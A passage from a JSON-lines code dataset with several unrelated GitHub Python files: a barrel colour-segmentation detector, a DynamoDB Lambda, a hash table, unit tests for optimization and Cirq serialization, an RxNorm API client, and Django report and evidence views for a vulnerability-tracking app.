np.reshape(current_image,(960000,3))\n\t\ttarget_blue_score = np.log(abs(np.linalg.det(self.target_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.target_blue_mean.transpose(),np.linalg.inv(self.target_blue_cov))),current_image.transpose()-self.target_blue_mean),axis=0),(800,1200))\n\t\tkettle_blue_score = np.log(abs(np.linalg.det(self.kettle_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.kettle_blue_mean.transpose(),np.linalg.inv(self.kettle_blue_cov))),current_image.transpose()-self.kettle_blue_mean),axis=0),(800,1200))\n\t\tstick_blue_score = np.log(abs(np.linalg.det(self.stick_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.stick_blue_mean.transpose(),np.linalg.inv(self.stick_blue_cov))),current_image.transpose()-self.stick_blue_mean),axis=0),(800,1200))\n\t\twall_blue_score = np.log(abs(np.linalg.det(self.wall_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.wall_blue_mean.transpose(),np.linalg.inv(self.wall_blue_cov))),current_image.transpose()-self.wall_blue_mean),axis=0),(800,1200))\n\t\tcarpet_blue_score = np.log(abs(np.linalg.det(self.carpet_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.carpet_blue_mean.transpose(),np.linalg.inv(self.carpet_blue_cov))),current_image.transpose()-self.carpet_blue_mean),axis=0),(800,1200))\n\t\tsecondscores = np.zeros((800,1200,5))\n\t\tsecondscores[:,:,0] = target_blue_score\n\t\tsecondscores[:,:,1] = kettle_blue_score\n\t\tsecondscores[:,:,2] = stick_blue_score\n\t\tsecondscores[:,:,3] = wall_blue_score\n\t\tsecondscores[:,:,4] = carpet_blue_score\n\t\t#secondscores[:,:,1] = target_blue_score+10\n\t\t#secondscores[:,:,2] = target_blue_score+10\n\t\t#secondscores[:,:,3] = target_blue_score+10\n\t\t#secondscores[:,:,4] = target_blue_score+10\n\t\tif average_illuminance < 100 and average_illuminance > 60:\n\t\t\tprint(1)\n\t\telse:\n\t\t\tsecondscores_m = np.argmin(secondscores,axis=2)\n\t\t\tsecondscores_m[np.where(mask_img==0)] = 1\n\t\t\tmask_img[np.where(secondscores_m!=0)] = 0\n\t\t\t\n\t\t#kernel = np.ones((3,3))\n\t\t#mask_img = cv2.morphologyEx(mask_img, cv2.MORPH_OPEN, kernel)\n\t\t#mask_img = cv2.dilate(mask_img,kernel,iterations = 1)\n\t\treturn mask_img\n\n\tdef get_bounding_box(self, img):\n\t\t'''\n\t\t\tFind the bounding box of the blue barrel\n\t\t\tcall other functions in this class if needed\n\t\t\t\n\t\t\tInputs:\n\t\t\t\timg - original image\n\t\t\tOutputs:\n\t\t\t\tboxes - a list of lists of bounding boxes. Each nested list is a bounding box in the form of [x1, y1, x2, y2] \n\t\t\t\twhere (x1, y1) and (x2, y2) are the top left and bottom right coordinate respectively. The order of bounding boxes in the list\n\t\t\t\tis from left to right in the image.\n\t\t\t\t\n\t\t\tOur solution uses xy-coordinate instead of rc-coordinate. More information: http://scikit-image.org/docs/dev/user_guide/numpy_images.html#coordinate-conventions\n\t\t'''\n\t\t# YOUR CODE HERE\n\t\timage = np.array(self.segment_image(img),np.uint8)*255\n\t\t#print(img.shape)\n\t\tret,thresh = cv2.threshold(image,127,255,0)\n\t\tcontours,hierarchy = cv2.findContours(thresh, 1, 2)\n\t\tboxes = []\n\n\t\t#print(np.shape(contours)[0])\n\t\tfor i in range(np.shape(contours)[0]):\n\t\t\tif (cv2.contourArea(contours[i])>200):\n\t\t\t\tx,y,w,h = cv2.boundingRect(contours[i])\n\t\t\t\tif h < 2.5*w and h > 1.3*w:\n\t\t\t\t\t#cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\n\t\t\t\t\tboxes.append([x,y,x+w,y+h])\n\t\t#cv2.imwrite('bounding_box_results/'+ str(1) + '.png', img)\n\t\tprint(boxes)\n\t\treturn boxes\n\n\nif __name__ == '__main__':\n\tfolder = \"trainset\"\n\tmy_detector = BarrelDetector()\n\tfor filename in os.listdir(folder):\n\t\t# read one test image\n\t\timg = cv2.imread(os.path.join(folder,filename))\n\t\tcv2.imshow('image', img)\n\t\tcv2.waitKey(0)\n\t\tcv2.destroyAllWindows()\n\n\t\t#Display results:\n\t\t#(1) Segmented images\n\t\tmask_img = my_detector.segment_image(img)\n\t\t#(2) Barrel bounding box\n\t\tboxes = my_detector.get_bounding_box(img)\n\t\t#The autograder checks your answers to the functions segment_image() and get_bounding_box()\n\t\t#Make sure your code runs as expected on the testset before submitting to Gradescope\n\n","repo_name":"shuangaj/Color_Segmentation","sub_path":"barrel_detector.py","file_name":"barrel_detector.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40586840399","text":"import boto3\nddb = boto3.client(\"dynamodb\")\n\ndef handler(event, context):\n\n try:\n data = ddb.scan(\n TableName=\"hirutest\",\n ExpressionAttributeValues={\n ':c': {\n 'S': \"balck\"\n },\n ':p': {\n 'S': \"500\"\n }\n },\n FilterExpression=\"colour = :c and price < :p\"\n )\n except BaseException as e:\n print(e)\n raise(e)\n\n\n\n\n \n return {\"message\": data}\n","repo_name":"HirudineeADRT/1216_hiruddb","sub_path":"1216_hiruddb/ddbcreator.py","file_name":"ddbcreator.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18570527331","text":"import hashlib\nimport math\n\n\nclass HashTable:\n def __init__(self, sz, stp):\n self.size = sz\n self.step = stp\n self.slots = [None] * self.size\n\n def hash_fun(self, value):\n '''\n в качестве value поступают строки!\n '''\n hash = hashlib.sha1()\n hash.update(value.encode())\n hash = int(hash.hexdigest()[:math.ceil(\n self.size / 16)], 16) # hex to int\n return hash % self.size\n\n def seek_slot(self, value):\n '''\n находит индекс пустого слота для значения, или None\n '''\n slot = self.hash_fun(value)\n # reapir collision\n max_loop = 10 * self.size\n while self.slots[slot] != None:\n max_loop -= 1\n if max_loop < 0:\n return None\n\n if abs(self.step) >= self.size:\n return None\n\n slot += self.step\n if slot >= self.size:\n slot -= self.size\n return slot\n\n def put(self, value):\n '''\n записываем значение по хэш-функции\n возвращается индекс слота или None,\n если из-за коллизий элемент не удаётся разместить\n '''\n slot = self.seek_slot(value)\n if slot == None:\n return None\n self.slots[slot] = value\n return slot\n\n def find(self, value):\n '''\n находит индекс слота со значением, или None\n '''\n slot = self.hash_fun(value)\n max_loop = 100\n while self.slots[slot] != value:\n max_loop -= 1\n if max_loop < 0:\n return None\n\n if abs(self.step) >= self.size:\n return None\n\n slot += self.step\n if slot >= self.size:\n slot -= self.size\n return slot\n\n def get_slots(self):\n return self.slots\n","repo_name":"mcnic/algorithms","sub_path":"hashTable.py","file_name":"hashTable.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12057795274","text":"import numpy as np\nimport unittest\nimport sys\nsys.path.append(\"..\")\nsys.path.append(\"../../..\")\n\n\n\n# import the test classes\n\n\n\nfrom optimization_algorithms.utils.finite_diff import *\nfrom optimization_algorithms.interface.mathematical_program import MathematicalProgram\n\nfrom solution import Problem0\n\nclass testProblem(unittest.TestCase):\n \"\"\"\n test on problem A\n \"\"\"\n\n problem = Problem0\n\n def testValue(self):\n C = np.ones((2,2))\n problem = self.problem(C)\n value = problem.evaluate(np.ones(2))[0][0]\n self.assertAlmostEqual(value,8)\n\n\n def testJacobian(self):\n \"\"\"\n \"\"\"\n C = np.ones((2,2))\n problem = self.problem(C)\n flag , _ , _= check_mathematical_program(problem.evaluate, np.array([-1,.5]) , 1e-5)\n self.assertTrue(flag)\n\n\n def testHessian(self):\n\n C = np.ones((2,2))\n problem = self.problem(C)\n x = np.array([-1, .1])\n H = problem.getFHessian(x)\n\n def f(x):\n return problem.evaluate(x)[0][0]\n\n tol = 1e-4\n Hdiff = finite_diff_hess(f,x,tol) \n flag = np.allclose( H , Hdiff, 10*tol, 10*tol)\n self.assertTrue(flag)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","repo_name":"Perceptronium/Optimization","sub_path":"a0_quadratic_function/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"394487786","text":"import os\nfrom distutils.core import setup\n\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='ShowInstalledPackages',\n packages=['ShowInstalledPackages'], # this must be the same as the name above\n summary='List all user installed packages and details',\n version='0.1.1',\n author='Larry McCaig (Larz60+)',\n author_email='larry@dimplechad.com',\n long_description=read('README.md'),\n license=\"MIT\",\n url='https://github.com/Larz60p/ShowInstalledPackages',\n download_url='https://github.com/Larz60p/ShowInstalledPackages/tarball/0.1.1',\n keywords='tools packages installed utilities',\n classifiers=[\n 'Development Status :: 1 - Alpha',\n 'Topic :: Utilities',\n 'License :: MIT License',\n ],\n)\n","repo_name":"Larz60p/ShowInstalledPackages","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24319858877","text":"import requests\nimport simplejson as json\nfrom typing import Dict\n\n\nclass RxNormIngredientATCConceptCall(object):\n \"\"\"\n Class encapsulates the data needed to call the RxNorm API and return the linked data elements for ATC mapping\n from a string.\n \"\"\"\n\n def __init__(self, ingredient_name: str):\n self.ingredient_name = ingredient_name\n self.rxnorm_api_base = 'https://rxnav.nlm.nih.gov/REST/'\n self.get_rxnorm_code_url = '{base}approximateTerm.json?term={ingredient_name}&maxEntries=1'.format(\n ingredient_name=self.ingredient_name,\n base=self.rxnorm_api_base) # Limit to top result\n self.rxcui = self.parse_get_rxnorm()\n self.get_atc_code_url = '{base}rxcui/{rxcui}/property?propName=ATC'.format(\n rxcui=self.rxcui,\n base=self.rxnorm_api_base)\n self.atc_code = self.parse_atc_code()\n\n @staticmethod\n def rx_norm_api_call(url: str) -> Dict:\n results = requests.get(url, headers={'Accept': 'application/json'})\n if results.status_code == 200:\n return json.loads(results.text)\n\n def parse_get_rxnorm(self) -> str:\n results = RxNormIngredientATCConceptCall.rx_norm_api_call(self.get_rxnorm_code_url)\n if results['approximateGroup'].get('candidate', None) is not None:\n return list(\n set([r.get('rxcui', None) for r in results['approximateGroup']['candidate'] if\n r['rank'] == '1']))[0]\n\n def parse_atc_code(self) -> str:\n results = RxNormIngredientATCConceptCall.rx_norm_api_call(self.get_atc_code_url)\n if results['propConceptGroup'] is not None:\n return list(set([r['propValue'] for r in results['propConceptGroup'].get('propConcept', [None])]))[0]\n\n\nif __name__ == '__main__':\n res = RxNormIngredientATCConceptCall('gabapentin')\n print(res.get_rxnorm_code_url)\n print(res.rxcui)\n print(res.atc_code)\n","repo_name":"r4intra/bainbridge_demo","sub_path":"code/utils/rxnorm_api_caller.py","file_name":"rxnorm_api_caller.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22179159576","text":"import numpy as np\nimport pytest\nimport sympy\n\nfrom google.protobuf import json_format\n\nimport cirq_google\nfrom cirq_google.serialization.arg_func_langs import (\n arg_from_proto,\n arg_to_proto,\n float_arg_from_proto,\n float_arg_to_proto,\n internal_gate_arg_to_proto,\n internal_gate_from_proto,\n ARG_LIKE,\n LANGUAGE_ORDER,\n)\nfrom cirq_google.api import v2\n\n\n@pytest.mark.parametrize(\n 'min_lang,value,proto',\n [\n ('', 1.0, {'arg_value': {'float_value': 1.0}}),\n ('', 1, {'arg_value': {'float_value': 1.0}}),\n ('', 'abc', {'arg_value': {'string_value': 'abc'}}),\n ('', [True, False], {'arg_value': {'bool_values': {'values': [True, False]}}}),\n ('', [42.9, 3.14], {'arg_value': {'double_values': {'values': [42.9, 3.14]}}}),\n ('', [3, 8], {'arg_value': {'int64_values': {'values': ['3', '8']}}}),\n ('', ['t1', 't2'], {'arg_value': {'string_values': {'values': ['t1', 't2']}}}),\n ('', sympy.Symbol('x'), {'symbol': 'x'}),\n (\n 'linear',\n sympy.Symbol('x') - sympy.Symbol('y'),\n {\n 'func': {\n 'type': 'add',\n 'args': [\n {'symbol': 'x'},\n {\n 'func': {\n 'type': 'mul',\n 'args': [{'arg_value': {'float_value': -1.0}}, {'symbol': 'y'}],\n }\n },\n ],\n }\n },\n ),\n (\n 'exp',\n sympy.Symbol('x') ** sympy.Symbol('y'),\n {'func': {'type': 'pow', 'args': [{'symbol': 'x'}, {'symbol': 'y'}]}},\n ),\n ],\n)\ndef test_correspondence(min_lang: str, value: ARG_LIKE, proto: v2.program_pb2.Arg):\n msg = v2.program_pb2.Arg()\n json_format.ParseDict(proto, msg)\n min_i = LANGUAGE_ORDER.index(min_lang)\n for i, lang in enumerate(LANGUAGE_ORDER):\n if i < min_i:\n with pytest.raises(ValueError, match='not supported by arg_function_language'):\n _ = arg_to_proto(value, arg_function_language=lang)\n with pytest.raises(ValueError, match='Unrecognized function type'):\n _ = arg_from_proto(msg, arg_function_language=lang)\n else:\n parsed = arg_from_proto(msg, arg_function_language=lang)\n packed = json_format.MessageToDict(\n arg_to_proto(value, arg_function_language=lang),\n including_default_value_fields=True,\n preserving_proto_field_name=True,\n use_integers_for_enums=True,\n )\n\n assert parsed == value\n assert packed == proto\n\n\ndef test_double_value():\n \"\"\"Note: due to backwards compatibility, double_val conversion is one-way.\n double_val can be converted to python float,\n but a python float is converted into a float_val not a double_val.\n \"\"\"\n msg = v2.program_pb2.Arg()\n msg.arg_value.double_value = 1.0\n parsed = arg_from_proto(msg, arg_function_language='')\n assert parsed == 1\n\n\ndef test_serialize_sympy_constants():\n proto = arg_to_proto(sympy.pi, arg_function_language='')\n packed = json_format.MessageToDict(\n proto,\n including_default_value_fields=True,\n preserving_proto_field_name=True,\n use_integers_for_enums=True,\n )\n assert len(packed) == 1\n assert len(packed['arg_value']) == 1\n # protobuf 3.12+ truncates floats to 4 bytes\n assert np.isclose(packed['arg_value']['float_value'], np.float32(sympy.pi), atol=1e-7)\n\n\ndef test_unsupported_function_language():\n with pytest.raises(ValueError, match='Unrecognized arg_function_language'):\n _ = arg_to_proto(\n sympy.Symbol('a') + sympy.Symbol('b'), arg_function_language='NEVER GONNAH APPEN'\n )\n with pytest.raises(ValueError, match='Unrecognized arg_function_language'):\n _ = arg_to_proto(3 * sympy.Symbol('b'), arg_function_language='NEVER GONNAH APPEN')\n with pytest.raises(ValueError, match='Unrecognized arg_function_language'):\n _ = arg_from_proto(\n v2.program_pb2.Arg(\n func=v2.program_pb2.ArgFunction(\n type='add',\n args=[v2.program_pb2.Arg(symbol='a'), v2.program_pb2.Arg(symbol='b')],\n )\n ),\n arg_function_language='NEVER GONNAH APPEN',\n )\n\n\n@pytest.mark.parametrize(\n 'value,proto',\n [\n ((True, False), {'arg_value': {'bool_values': {'values': [True, False]}}}),\n (\n np.array([True, False], dtype=bool),\n {'arg_value': {'bool_values': {'values': [True, False]}}},\n ),\n ],\n)\ndef test_serialize_conversion(value: ARG_LIKE, proto: v2.program_pb2.Arg):\n msg = v2.program_pb2.Arg()\n json_format.ParseDict(proto, msg)\n packed = json_format.MessageToDict(\n arg_to_proto(value, arg_function_language=''),\n including_default_value_fields=True,\n preserving_proto_field_name=True,\n use_integers_for_enums=True,\n )\n assert packed == proto\n\n\n@pytest.mark.parametrize(\n 'value,proto',\n [\n (4, v2.program_pb2.FloatArg(float_value=4.0)),\n (1.0, v2.program_pb2.FloatArg(float_value=1.0)),\n (sympy.Symbol('a'), v2.program_pb2.FloatArg(symbol='a')),\n (\n sympy.Symbol('a') + sympy.Symbol('b'),\n v2.program_pb2.FloatArg(\n func=v2.program_pb2.ArgFunction(\n type='add',\n args=[v2.program_pb2.Arg(symbol='a'), v2.program_pb2.Arg(symbol='b')],\n )\n ),\n ),\n ],\n)\ndef test_float_args(value, proto):\n assert float_arg_to_proto(value) == proto\n assert float_arg_from_proto(proto, arg_function_language='exp') == value\n\n\ndef test_missing_required_arg():\n with pytest.raises(ValueError, match='blah is missing'):\n _ = float_arg_from_proto(\n v2.program_pb2.FloatArg(), arg_function_language='exp', required_arg_name='blah'\n )\n with pytest.raises(ValueError, match='unrecognized argument type'):\n _ = arg_from_proto(\n v2.program_pb2.Arg(), arg_function_language='exp', required_arg_name='blah'\n )\n with pytest.raises(ValueError, match='Unrecognized function type '):\n _ = arg_from_proto(\n v2.program_pb2.Arg(func=v2.program_pb2.ArgFunction(type='magic')),\n arg_function_language='exp',\n required_arg_name='blah',\n )\n assert arg_from_proto(v2.program_pb2.Arg(), arg_function_language='exp') is None\n\n\ndef test_unrecognized_arg():\n \"\"\"Getting to some parts of the codes imply that the\n set of supported of languages has changed. Modify the\n supported languages to simulate this future code change.\"\"\"\n cirq_google.serialization.arg_func_langs.SUPPORTED_FUNCTIONS_FOR_LANGUAGE['test'] = frozenset(\n {'magic'}\n )\n\n with pytest.raises(ValueError, match='could not be processed'):\n _ = float_arg_from_proto(\n v2.program_pb2.Arg(func=v2.program_pb2.ArgFunction(type='magic')),\n arg_function_language='test',\n required_arg_name='blah',\n )\n # Clean up for hermetic testing\n del cirq_google.serialization.arg_func_langs.SUPPORTED_FUNCTIONS_FOR_LANGUAGE['test']\n\n\ndef test_invalid_float_arg():\n with pytest.raises(ValueError, match='unrecognized argument type'):\n _ = float_arg_from_proto(\n v2.program_pb2.Arg(arg_value=v2.program_pb2.ArgValue(float_value=0.5)),\n arg_function_language='test',\n required_arg_name='blah',\n )\n\n\n@pytest.mark.parametrize('rotation_angles_arg', [{}, {'rotation_angles': [0.1, 0.3]}])\n@pytest.mark.parametrize('qid_shape_arg', [{}, {'qid_shape': [2, 2]}])\n@pytest.mark.parametrize('tags_arg', [{}, {'tags': ['test1', 'test2']}])\n@pytest.mark.parametrize('lang', LANGUAGE_ORDER)\ndef test_internal_gate_serialization(rotation_angles_arg, qid_shape_arg, tags_arg, lang):\n g = cirq_google.InternalGate(\n gate_name='g',\n gate_module='test',\n num_qubits=5,\n **rotation_angles_arg,\n **qid_shape_arg,\n **tags_arg,\n )\n proto = v2.program_pb2.InternalGate()\n internal_gate_arg_to_proto(g, out=proto)\n v = internal_gate_from_proto(proto, lang)\n assert g == v\n\n\ndef test_invalid_list():\n with pytest.raises(ValueError):\n _ = arg_to_proto(['', 1])\n\n with pytest.raises(ValueError):\n _ = arg_to_proto([1.0, ''])\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-google/cirq_google/serialization/arg_func_langs_test.py","file_name":"arg_func_langs_test.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"25363740353","text":"# -*- coding: utf-8 -*-\n# Disabling this rule is necessary for include returns inside if-else structure\n# pylint: disable-msg=no-else-return\n# pylint: disable=too-many-lines\n\"\"\"Views and services for FluidIntegrates.\"\"\"\n\nimport os\nimport sys\nimport time\nfrom datetime import datetime, timedelta\n\nimport boto3\nimport rollbar\nimport yaml\nfrom django.conf import settings\nfrom django.core.cache.backends.base import DEFAULT_TIMEOUT\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.cache import never_cache, cache_control\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_http_methods\nfrom jose import jwt\nfrom magic import Magic\nfrom openpyxl import load_workbook, Workbook\n\nfrom backend import util\nfrom backend.domain import (\n finding as finding_domain, project as project_domain, user as user_domain)\nfrom backend.domain.vulnerability import (\n group_specific, get_open_vuln_by_type, get_vulnerabilities_by_type\n)\nfrom backend.decorators import authenticate, authorize, cache_content\nfrom backend.dal import (\n finding as finding_dal, user as user_dal\n)\nfrom backend.services import (\n has_access_to_project, has_access_to_finding, has_access_to_event\n)\nfrom backend.utils import reports\n\nfrom __init__ import (\n FI_AWS_S3_ACCESS_KEY, FI_AWS_S3_SECRET_KEY, FI_AWS_S3_BUCKET\n)\n\nfrom app.documentator.pdf import CreatorPDF\nfrom app.documentator.secure_pdf import SecurePDF\nfrom app.documentator.all_vulns import generate_all_vulns_xlsx\nfrom app.techdoc.it_report import ITReport\n\nCACHE_TTL = getattr(settings, 'CACHE_TTL', DEFAULT_TIMEOUT)\n\nCLIENT_S3 = boto3.client('s3',\n aws_access_key_id=FI_AWS_S3_ACCESS_KEY,\n aws_secret_access_key=FI_AWS_S3_SECRET_KEY)\n\nBUCKET_S3 = FI_AWS_S3_BUCKET\nBASE_URL = \"https://fluidattacks.com/integrates\"\n\n\n@never_cache\ndef index(request):\n \"Login view for unauthenticated users\"\n parameters = {'debug': settings.DEBUG}\n return render(request, \"index.html\", parameters)\n\n\ndef error500(request):\n \"Internal server error view\"\n parameters = {}\n return render(request, \"HTTP500.html\", parameters)\n\n\ndef error401(request, _):\n \"Unauthorized error view\"\n parameters = {}\n return render(request, \"HTTP401.html\", parameters)\n\n\n@csrf_exempt\n@cache_control(private=True, max_age=3600)\n@authenticate\ndef app(request):\n \"\"\" App view for authenticated users \"\"\"\n try:\n parameters = {\n 'debug': settings.DEBUG,\n 'username': request.session['username']\n }\n response = render(request, 'app.html', parameters)\n token = jwt.encode(\n {\n 'user_email': request.session['username'],\n 'user_role': request.session['role'],\n 'company': request.session['company'],\n 'first_name': request.session['first_name'],\n 'last_name': request.session['last_name'],\n 'exp': datetime.utcnow() +\n timedelta(seconds=settings.SESSION_COOKIE_AGE)\n },\n algorithm='HS512',\n key=settings.JWT_SECRET,\n )\n response.set_cookie(\n key=settings.JWT_COOKIE_NAME,\n value=token,\n secure=True,\n # Temporary while ariadne migration is finished\n httponly=not settings.DEBUG,\n max_age=settings.SESSION_COOKIE_AGE\n )\n except KeyError:\n rollbar.report_exc_info(sys.exc_info(), request)\n return redirect('/integrates/error500')\n return response\n\n\n@csrf_exempt\n@authenticate\ndef logout(request):\n \"Close a user's active session\"\n\n HttpResponse(\"\")\n try:\n request.session.flush()\n except KeyError:\n rollbar.report_exc_info(sys.exc_info(), request)\n\n response = redirect(\"/integrates/index\")\n response.delete_cookie(settings.JWT_COOKIE_NAME)\n return response\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@authorize(['analyst', 'customer', 'admin'])\ndef project_to_xls(request, lang, project):\n \"Create the technical report\"\n username = request.session['username'].split(\"@\")[0]\n if project.strip() == \"\":\n rollbar.report_message(\n 'Error: Empty fields in project', 'error', request)\n return util.response([], 'Empty fields', True)\n if not has_access_to_project(request.session['username'],\n project, request.session['role']):\n util.cloudwatch_log(\n request,\n 'Security: Attempted to export project xls without permission')\n return util.response([], 'Access denied', True)\n if lang not in [\"es\", \"en\"]:\n rollbar.report_message('Error: Unsupported language', 'error', request)\n return util.response([], 'Unsupported language', True)\n findings = finding_domain.get_findings(\n project_domain.list_findings(project.lower()))\n if findings:\n findings = [cast_new_vulnerabilities(\n get_open_vuln_by_type(finding['findingId'], request), finding)\n for finding in findings]\n else:\n rollbar.report_message(\n 'Project {} does not have findings in dynamo'.format(project),\n 'warning',\n request)\n return util.response([], 'Empty fields', True)\n data = util.ord_asc_by_criticidad(findings)\n it_report = ITReport(project, data, username)\n filepath = it_report.result_filename\n reports.set_xlsx_password(filepath, time.strftime('%d%m%Y') + username)\n\n with open(filepath, 'rb') as document:\n response = HttpResponse(document.read())\n response['Content-Type'] = ('application/vnd.openxmlformats'\n '-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'inline;filename={}.xlsx'.format(\n project)\n return response\n\n\ndef validation_project_to_pdf(request, lang, doctype):\n if lang not in [\"es\", \"en\"]:\n rollbar.report_message('Error: Unsupported language', 'error', request)\n return util.response([], 'Unsupported language', True)\n if doctype not in [\"tech\", \"executive\"]:\n rollbar.report_message('Error: Unsupported doctype', 'error', request)\n return util.response([], 'Unsupported doctype', True)\n return None\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@authorize(['analyst', 'customer', 'admin'])\ndef project_to_pdf(request, lang, project, doctype):\n \"Export a project to a PDF\"\n assert project.strip()\n if not has_access_to_project(request.session['username'],\n project, request.session['role']):\n util.cloudwatch_log(request, 'Security: Attempted to export project'\n ' pdf without permission')\n return util.response([], 'Access denied', True)\n else:\n user = request.session['username'].split('@')[0]\n validator = validation_project_to_pdf(request, lang, doctype)\n if validator is not None:\n return validator\n findings = finding_domain.get_findings(\n project_domain.list_findings(project.lower()))\n findings = [cast_new_vulnerabilities(\n get_open_vuln_by_type(finding['findingId'], request), finding)\n for finding in findings]\n description = project_domain.get_description(project.lower())\n\n pdf_maker = CreatorPDF(lang, doctype)\n secure_pdf = SecurePDF()\n findings_ord = util.ord_asc_by_criticidad(findings)\n findings = pdf_evidences(findings_ord)\n report_filename = ''\n if doctype == 'tech':\n pdf_maker.tech(findings, project, description)\n report_filename = secure_pdf.create_full(user,\n pdf_maker.out_name,\n project)\n else:\n return HttpResponse(\n 'Disabled report generation', content_type='text/html')\n if not os.path.isfile(report_filename):\n rollbar.report_message(\n 'Couldn\\'t generate pdf report', 'error', request)\n return HttpResponse(\n 'Couldn\\'t generate pdf report', content_type='text/html')\n with open(report_filename, 'rb') as document:\n response = HttpResponse(document.read(),\n content_type='application/pdf')\n response['Content-Disposition'] = \\\n 'inline;filename={}_IT.pdf'.format(project)\n return response\n\n\ndef pdf_evidences(findings):\n for finding in findings:\n folder_name = finding['projectName'] + '/' + finding['findingId']\n evidence = finding['evidence']\n evidence_set = [{\n 'id': '{}/{}'.format(folder_name, evidence[ev_item]['url']),\n 'explanation': evidence[ev_item]['description'].capitalize()\n } for ev_item in evidence if evidence[ev_item]['url'].endswith('.png')]\n\n if evidence_set:\n finding['evidence_set'] = evidence_set\n for evidence in evidence_set:\n CLIENT_S3.download_file(\n BUCKET_S3,\n evidence['id'],\n '/usr/src/app/app/documentator/images/' +\n evidence['id'].split('/')[2])\n evidence['name'] = 'image::../images/' + \\\n evidence['id'].split('/')[2] + '[align=\"center\"]'\n\n return findings\n\n\ndef cast_new_vulnerabilities(finding_new, finding):\n \"\"\"Cast values for new format.\"\"\"\n if finding_new.get('openVulnerabilities') >= 0:\n finding['openVulnerabilities'] = \\\n str(finding_new.get('openVulnerabilities'))\n else:\n # This finding does not have open vulnerabilities\n pass\n where = '-'\n if finding_new.get('portsVulns'):\n finding['portsVulns'] = \\\n group_specific(finding_new.get('portsVulns'), 'ports')\n where = format_where(where, finding['portsVulns'])\n else:\n # This finding does not have ports vulnerabilities\n pass\n if finding_new.get('linesVulns'):\n finding['linesVulns'] = \\\n group_specific(finding_new.get('linesVulns'), 'lines')\n where = format_where(where, finding['linesVulns'])\n else:\n # This finding does not have lines vulnerabilities\n pass\n if finding_new.get('inputsVulns'):\n finding['inputsVulns'] = \\\n group_specific(finding_new.get('inputsVulns'), 'inputs')\n where = format_where(where, finding['inputsVulns'])\n else:\n # This finding does not have inputs vulnerabilities\n pass\n finding['where'] = where\n return finding\n\n\ndef format_where(where, vulnerabilities):\n \"\"\"Formate where field with new vulnerabilities.\"\"\"\n for vuln in vulnerabilities:\n where = '{where!s}{vuln_where!s} ({vuln_specific!s})\\n'\\\n .format(where=where,\n vuln_where=vuln.get('where'),\n vuln_specific=vuln.get('specific'))\n return where\n\n\ndef format_release_date(finding):\n finding_dynamo = finding_domain.get_finding(finding['findingId'])\n if finding_dynamo:\n if finding_dynamo[0].get(\"releaseDate\"):\n finding[\"releaseDate\"] = finding_dynamo[0].get(\"releaseDate\")\n if finding_dynamo[0].get(\"lastVulnerability\"):\n finding[\"lastVulnerability\"] = \\\n finding_dynamo[0].get(\"lastVulnerability\")\n if finding.get(\"releaseDate\"):\n final_date = util.calculate_datediff_since(finding[\"releaseDate\"])\n finding['edad'] = final_date.days\n final_vuln_date = util.calculate_datediff_since(finding[\"lastVulnerability\"])\n finding['lastVulnerability'] = final_vuln_date.days\n else:\n finding['lastVulnerability'] = '-'\n return finding\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@authorize(['analyst', 'customer', 'admin'])\ndef get_evidence(request, project, evidence_type, findingid, fileid):\n username = request.session['username']\n role = request.session['role']\n if (evidence_type in ['drafts', 'findings']\n and has_access_to_finding(username, findingid, role)) \\\n or (evidence_type == 'events'\n and has_access_to_event(username, findingid, role)):\n if fileid is None:\n rollbar.report_message('Error: Missing evidence image ID',\n 'error', request)\n return HttpResponse(\"Error - Unsent image ID\",\n content_type=\"text/html\")\n key_list = key_existing_list(f'{project.lower()}/{findingid}/{fileid}')\n if key_list:\n for k in key_list:\n start = k.find(findingid) + len(findingid)\n localfile = \"/tmp\" + k[start:]\n ext = {'.png': '.tmp', '.gif': '.tmp'}\n localtmp = util.replace_all(localfile, ext)\n CLIENT_S3.download_file(BUCKET_S3, k, localtmp)\n return retrieve_image(request, localtmp)\n else:\n return util.response([], 'Access denied or evidence not found', True)\n else:\n util.cloudwatch_log(\n request,\n 'Security: Attempted to retrieve evidence without permission')\n return util.response([], 'Access denied or evidence not found', True)\n\n\ndef retrieve_image(request, img_file):\n if util.assert_file_mime(img_file, [\"image/png\", \"image/jpeg\",\n \"image/gif\"]):\n with open(img_file, \"rb\") as file_obj:\n mime = Magic(mime=True)\n mime_type = mime.from_file(img_file)\n return HttpResponse(file_obj.read(), content_type=mime_type)\n else:\n rollbar.report_message('Error: Invalid 